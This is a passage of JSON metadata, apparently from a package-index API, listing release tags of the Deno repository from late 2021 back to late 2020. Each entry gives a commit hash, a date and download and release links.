itHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/st